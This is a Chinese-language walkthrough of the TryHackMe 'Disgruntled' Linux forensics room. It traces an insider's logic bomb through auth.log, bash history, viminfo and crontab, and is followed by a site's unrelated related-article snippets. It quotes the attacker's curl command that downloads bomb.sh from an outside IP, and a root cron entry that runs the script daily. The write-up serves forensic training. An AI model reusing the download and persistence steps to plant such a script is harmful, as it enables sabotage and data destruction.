【THM】linux取证 DisGruntled

 

目录

0x00  房间介绍

0x01  连接并简单排查

0x02  让我们看看做没做坏事

0x03  炸弹已埋下。但何时何地?

0x04  收尾

 0x05   结论


0x00  房间介绍

嘿,孩子!太好了,你来了!
不知道您是否看过这则新闻,我们客户之一(Cyber​​T)的 IT 部门的一名员工被警方逮捕了。这 家伙正在兼职,成功开展 网络钓鱼行动
Cyber​​T 希望我们检查此人是否对他们的任何资产做过任何恶意的事情。准备好,喝杯咖啡,然后到会议室见我。

0x01  连接并简单排查

我们通过ssh连接到该机器

 查看两个任务,我们思考一下如何解决。

 我们知道auth.log文件记录了系统的日志信息,所以安装包的命令会在上面留下日志。

/var/log/auth.log 文件用于记录与系统认证和授权相关的日志信息。这包括:

  • 用户登录和注销事件
  • 使用 sudo 执行的命令
  • SSH 登录尝试
  • 系统服务(如 PAM)相关的认证事件

我们使用下面这段代码进行查询与sudo有关的日志查询。

sudo cat /var/log/auth.log | grep sudo

 最终我找到了这条命令,但是我复盘的时候发现,应该有更好用的命令。

因为是安装包的命令,肯定会有apt或者yum,所以我们再加入一个条件限制搜索结果。

sudo cat /var/log/auth.log | grep sudo | grep apt

这条命令就过滤的很简单。

同时同一行也有工作目录。

0x02  让我们看看做没做坏事

 首先创建用户必须是root或者sudo提权,并且linux添加用户的操作是useradd,根据此信息,我们编写一个脚本去终端中执行。

sudo cat /var/log/auth.log | grep adduser | grep sudo

 我的疑问:adduser,和useradd的区别,ai给出了很好的解释

 第二个问题,sudoer文件什么时候更新。

知识:编辑 /etc/sudoers 文件时会调用“visudo”。在日志中查找此命令。

sudo cat /var/log/auth.log | grep visudo

我们使用此命令查找到了文件更新时间。

第三个任务,我们可以知道使用了vi编辑器

/home/Viminfo 文件包含在 Vim 中打开的文件的命令行历史记录、搜索字符串历史记录等。

 很开门,但是没啥用,我们使用下面的命令直接得到编辑命令

sudo cat /var/log/auth.log | grep vi

0x03  炸弹已埋下。但何时何地?

bomb.sh 文件是一个巨大的危险信号! 虽然文件本身已经足以证明其有罪,但我们仍需要找出它的来源和内容。问题是该文件已不存在。

我们看看任务都有什么?

 上文我们已经得到了文件的路径,我随后跟进到这个目录,发现这个文件已经被删除。

我发现隐藏文件有一个.bash_history

/home/user/Bash_history 文件列出了除使用 sudo 运行的命令之外的所有命令,这些命令都存储在 bash 历史记录中。我们打开它,发现了有关恶意文件的信息。

 创建bomb.sh的命令,curl 10.10.158.38:8080/bomb.sh --output bomb.sh

指的是访问这个站点的sh文件并将它保存到本地

任务者提到了这个sh文件被移到了其他位置,但是没有被发现。

我们查看一下viminfo文件

/home/viminfo 文件包含在 Vim 中打开的文件的命令行历史记录、搜索字符串历史记录等。

 

对于vim编辑器来说:

  • : 开始了一个 Ex 命令。
  • saveas 是一个命令,用于保存编辑的内容到一个新文件

我们知道了它被移动的位置。

文件最后被修改的时间是一个问题,但是我找到了时间戳

date -d @1672208955

 我们可以使用这个命令将时间戳变成时间。

最后一个问题十分简单,我们直接访问那个文件,查看这个sh文件执行的命令就可以得出啦!

0x04  收尾

 我们知道这个文件被加入了定时任务中,我们去查看一下.

查看定时任务

cat /etc/crontab

0 8 * * * root /bin/os-update.sh

具体解释如下:

  • 0: 表示分钟,0 表示整点。
  • 8: 表示小时,8 表示上午 8 点。
  • *: 表示日(每个月的每天都会触发)。
  • *: 表示月(每年的每个月都会触发)。
  • *: 表示星期几(每周的每一天都会触发)。

表示在 每天的 8:00 AMroot 用户 执行 /bin/os-update.sh 脚本。 

0x05   结论

感谢您,现在我们知道了我们那位心怀不满的 IT 人员在计划什么。

我们知道,他在机器上下载了一个事先准备好的脚本,如果用户在过去 30 天内没有登录过这台机器,这个脚本就会删除已安装服务的所有文件。这绝对是“逻辑炸弹”的典型例子。

看看你,上班第二天,你就帮我解决了两个案子。告诉索菲,我让你涨工资了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/468982.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MFC中Excel的导入以及使用步骤

参考地址 在需要对EXCEL表进行操作的类中添加以下头文件:若出现大量错误将其放入stdafx.h中 #include "resource.h" // 主符号 #include "CWorkbook.h" //单个工作簿 #include "CRange.h" //区域类,对Excel大…

智能化温室大棚控制系统设计(论文+源码)

1 系统的功能及方案设计 本次智能化温室大棚控制系统的设计其系统整体结构如图2.1所示,整个系统在器件上包括了主控制器STC89C52,温湿度传感器DHT11,LCD1602液晶,继电器,CO2传感器,光敏电阻,按…

一篇文章教会你使用Linux的‘sed‘基础命令

Linux sed 命令详解 Linux sed 命令详解1、基本语法2、常用命令2.1 替换2.2 删除行2.3 查找并打印行2.4 插入与追加2.5 多命令组合 3、高级用法3.1 替换并保存结果到新文件3.2 在范围内替换3.3 正则表达式匹配 4、小结 Linux sed 命令详解 sed 是 Linux 系统中非常强大的流编辑…

集群化消息服务解决方案

目录 集群化消息服务解决方案项目概述架构图使用说明服务端通过API接口推送消息给客户端调用方式 请求参数返回参数 客户端推送消息连接websocket或发送消息 接收消息项目地址作者信息 集群化消息服务解决方案 项目概述 集群化消息服务解决方案是一种用于处理大量消息的高可用…

elementUI 点击弹出时间 date-picker

elementUI的日期组件,有完整的UI样式及弹窗,但是我的页面不要它的UI样式,点击的时候却要弹出类似的日期选择器,那怎么办呢? 以下是elementUI自带的UI风格,一定要一个输入框来触发。 这是我的项目中要用到的…

【go从零单排】go中的三种数据类型array、slices、maps

Don’t worry , just coding! 内耗与overthinking只会削弱你的精力,虚度你的光阴,每天迈出一小步,回头时发现已经走了很远。 array数组 package mainimport "fmt"func main() {var a [5]int //var关键字定义数组,[5]表…

科技改变阅读习惯:最新研究揭示电子阅读器的普及趋势

据QYResearch调研团队最新报告“全球电子阅读器市场报告2023-2029”显示,预计2029年全球电子阅读器市场规模将达到6.9亿美元,未来几年年复合增长率CAGR为0.4%。 如上图表/数据,摘自QYResearch最新报告“全球电子阅读器市场研究报告2023-2029.…

解决 VSCode 中 C/C++ 编码乱码问题的两种方法

解决 VSCode 中 C/C 编码乱码问题的两种方法 在中国地区,Windows 系统中的 cmd 和 PowerShell 默认编码是 GBK,但 VSCode 默认使用 UTF-8 编码。这种编码不一致会导致在 VSCode 终端中运行 C/C 程序时出现乱码。以下介绍两种方法来解决这一问题。 方法…

UE5遇到问题记录

问题描述: 在让敌人自动追踪玩家的时候一开始运行就会播放攻击的动画 解决方法: 这样是因为敌人一开始就检测到自己了,所以触发动画。 方式一:加一个条件 方式二:改一下碰撞预设

内网对抗-信息收集篇SPN扫描DC定位角色区域定性服务探针安全防护凭据获取

知识点: 1、信息收集篇-网络架构-出网&角色&服务&成员 2、信息收集篇-安全防护-杀毒&防火墙&流量监控 3、信息收集篇-密码凭据-系统&工具&网站&网络域渗透的信息收集: 在攻防演练中,当完成边界突破后进入内…

基于Matlab 疲劳驾驶检测

Matlab 疲劳驾驶检测 课题介绍 该课题为基于眼部和嘴部的疲劳驾驶检测。带有一个人机交互界面GUI,通过输入视频,分帧,定位眼睛和嘴巴,通过眼睛和嘴巴的张合度,来判别是否疲劳。 二、操作步骤 第一步:最…

11.11 代码块

一 java 1.代码块 1) 理解 使用构造器时:先默认 调用代码块内容 再调用 构造器内容【代码块 > 构造器】 1.1 细节 1)静态代码块 只能加载一次 2)先调用父类代码块 再子类代码块 3)静态代码块是随着类加载而执行…

在gitlab,把新分支替换成master分支

1、备份master分支,可以打tag 2、删除master分支 正常情况下,master分支不允许删除,需要做两个操作才能删除 a、变更项目默认分支为非master分支,可以先随便选择 b、取消master为非保护分支 操作了上述两步,就可以删…

在使用element中的抽屉<el-drawer>页签<el-tabs/>组合时,echarts图表宽度显示异常问题

类似这种情况,宽度异常 原因:在展示出抽屉时,图表的组件一件初始化了,导致他的宽度提前设定好了(我默认的style"width: 100%; height: 300px;"),我得解决方法有2个: 1、第…

《大模型应用开发极简入门》笔记

推荐序 可略过不看。 初识GPT-4和ChatGPT LLM概述 NLP的目标是让计算机能够处理自然语言文本,涉及诸多任务: 文本分类:将输入文本归为预定义的类别。自动翻译:将文本从一种语言自动翻译成另一种语言,包括程序语言。…

Unicode字符集(万国码)

1.三种编码方式: UTF-16:16个bit位(2个字节)存储 UTF-32:32个bit位(4个字节)存储 UTF-8:可变长度字符编码。1-4个字节存储,只需记住:英文字母1个字节表示&…

支持 Win10 的网络环境模拟(丢包,延迟,带宽)

升级 Windows 10 以后,原来各种网络模拟软件都挂掉了,目前能用的就是只有 clumsy: 唯一问题是不支持模拟带宽,那么平时要模拟一些糟糕的网络情况的话,是不太方便的,而开虚拟机用 Linux tc 或者设置个远程 l…

【Homework】【5】Learning resources for DQ Robotics in MATLAB

Lesson 5 代码-TwoDofPlanarRobot.m 表示一个 2 自由度平面机器人。该类包含构造函数、计算正向运动学模型的函数、计算平移雅可比矩阵的函数,以及在二维空间中绘制机器人的函数。 classdef TwoDofPlanarRobot%TwoDofPlanarRobot - 表示一个 2 自由度平面机器人类…

在模方置平建筑失败的原因是什么?

在模方置平建筑失败的原因是什么? 可能是obj拓扑不连续,可以在网格大师使用osgb转obj功能,选择拓扑或者重建。 网格大师是一款能够解决实景三维模型空间参考、原点、瓦块大小不统一,重叠区域处理问题的工具“百宝箱”&#xff0c…

【大咖云集 | IEEE计算智能学会广州分会支持】第四届信息技术与当代体育国际学术会议(TCS 2024,12月13-15日)

第四届信息技术与当代体育国际学术会议(TCS 2024) 2024 4th International Conference on Information Technology and Contemporary Sports 重要信息 会议官网:www.icitcs.net(会议关键词:TCS 2024) 202…